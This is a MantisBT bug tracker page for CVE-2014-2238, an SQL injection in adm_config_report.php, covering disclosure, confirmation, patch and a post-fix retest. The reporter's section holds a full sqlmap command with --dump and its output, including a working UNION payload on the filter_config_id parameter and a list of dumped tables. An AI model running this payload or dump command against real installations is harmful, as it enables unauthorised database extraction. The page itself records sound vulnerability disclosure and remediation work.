MantisBT

View Issue Details Jump to Notes ] Wiki ] Related Changesets ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0017055mantisbtsecuritypublic2014-02-28 11:002014-03-03 14:24
ReporterHauntIT 
Assigned Todregad 
PriorityimmediateSeveritymajorReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Version1.2.13 
Target Version1.2.17Fixed in Version1.2.17 
Summary0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
DescriptionJakub Galczyk from HauntIT discovered an SQL injection vulnerability in manage configuration page.
Additional Informationk@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" [^] --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; __utma=65758510.2100553510.1393586134.1393586134.1393586134.1; __utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org [^]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:19:12

[15:19:12] [INFO] testing connection to the target URL
[15:19:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie h
[15:19:16] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[15:19:17] [INFO] testing if POST parameter 'save' is dynamic
[15:19:17] [WARNING] POST parameter 'save' does not appear dynamic
(...)
[15:20:32] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:22:22] [INFO] testing 'Generic UNION query (11) - 1 to 10 columns'
[15:22:25] [INFO] target URL appears to be UNION injectable with 7 columns
[15:22:32] [INFO] POST parameter 'filter_config_id' is 'Generic UNION query (11) - 1 to 10 columns' injectable
POST parameter 'filter_config_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
(...)

[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
sqlmap identified the following injection points with a total of 815 HTTP(s) requests:
---
Place: POST
Parameter: filter_config_id
    Type: UNION query
    Title: Generic UNION query (11) - 6 columns
    Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-4074' UNION ALL SELECT 11,CONCAT(0x716b737471,0x737a4e7050735579665a,0x71706b6d71),11,11,11,11-- &apply_filter_button=Apply Filter
---
[15:23:13] [INFO] testing MySQL
[15:23:14] [INFO] confirming MySQL
[15:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:23:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:23:14] [INFO] fetching current database
[15:23:14] [INFO] fetching tables for database: 'bugtracker'
[15:23:14] [INFO] the SQL query used returns 31 entries
[15:23:15] [INFO] retrieved: "mantis_bug_file_table"
[15:23:15] [INFO] retrieved: "mantis_bug_history_table"
[15:23:15] [INFO] retrieved: "mantis_bug_monitor_table"
[15:23:15] [INFO] retrieved: "mantis_bug_relationship_table"
[15:23:15] [INFO] retrieved: "mantis_bug_revision_table"
[15:23:15] [INFO] retrieved: "mantis_bug_table"
[15:23:16] [INFO] retrieved: "mantis_bug_tag_table"
[15:23:16] [INFO] retrieved: "mantis_bug_text_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_text_table"
[15:23:16] [INFO] retrieved: "mantis_category_table"
(...)
TagsNo tags attached.
Attached Files

- Relationships

-  Notes
User avatar (0039585)
dregad (developer)
2014-02-28 12:11
edited on: 2014-02-28 12:12

I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param().

Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de

User avatar (0039586)
dregad (developer)
2014-02-28 12:33

sqlmap test after patching:

[*] starting at 18:32:39

[18:32:39] [INFO] testing connection to the target URL
[18:32:39] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:32:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. 
If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual 
paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] 
[18:32:41] [INFO] skipping POST parameter 'save'
[18:32:41] [INFO] skipping POST parameter 'filter_user_id'
[18:32:41] [INFO] skipping POST parameter 'filter_project_id'
[18:32:41] [INFO] testing if POST parameter 'filter_config_id' is dynamic
[18:32:41] [INFO] confirming that POST parameter 'filter_config_id' is dynamic
[18:32:42] [INFO] POST parameter 'filter_config_id' is dynamic
[18:32:42] [WARNING] heuristic (basic) test shows that POST parameter 'filter_config_id' might not be 
injectable
[18:32:42] [INFO] testing for SQL injection on POST parameter 'filter_config_id'
[18:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:32:44] [INFO] testing 'MySQL inline queries'
[18:32:44] [WARNING] reflective value(s) found and filtering out
[18:32:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:32:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:32:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:59] [WARNING] POST parameter 'filter_config_id' is not injectable
[18:32:59] [INFO] skipping POST parameter 'apply_filter_button'
[18:32:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' 
values to perform more tests. Also, you can try to rerun by providing either a valid value for option 
'--string' (or '--regexp')

[*] shutting down at 18:32:59
User avatar (0039587)
dregad (developer)
2014-02-28 15:03

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241 [^]

- Related Changesets
MantisBT: master-1.2.x a608f2d0
Timestamp: 2014-02-28 12:23:14
Author: dregad
Details ] Diff ]
Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/ [^]) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php Diff ] File ]
MantisBT: master e8bdd248
Timestamp: 2014-02-28 12:23:14
Author: dregad
Details ] Diff ]
Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/ [^]) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055
mod - adm_config_report.php Diff ] File ]

- Issue History
Date Modified Username Field Change
2014-02-28 11:00 dregad New Issue
2014-02-28 11:01 dregad Reporter dregad => HauntIT
2014-02-28 12:11 dregad Note Added: 0039585
2014-02-28 12:11 dregad Status new => confirmed
2014-02-28 12:11 dregad Product Version 1.2.16 => 1.2.13
2014-02-28 12:12 dregad Note Edited: 0039585 View Revisions
2014-02-28 12:31 dregad Changeset attached => MantisBT master-1.2.x a608f2d0
2014-02-28 12:31 dregad Assigned To => dregad
2014-02-28 12:31 dregad Status confirmed => resolved
2014-02-28 12:31 dregad Resolution open => fixed
2014-02-28 12:31 dregad Fixed in Version => 1.2.17
2014-02-28 12:31 dregad Changeset attached => MantisBT master e8bdd248
2014-02-28 12:33 dregad Note Added: 0039586
2014-02-28 12:35 dregad View Status private => public
2014-02-28 15:03 dregad Note Added: 0039587
2014-02-28 15:35 dregad Summary SQL injection vulnerability in adm_config_report.php => CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
2014-03-03 14:24 dregad Status resolved => closed


MantisBT 1.2.17 [^]
Copyright © 2000 - 2014 MantisBT Team
Time: 0.1197 seconds.
memory usage: 3,019 KB
Powered by Mantis Bugtracker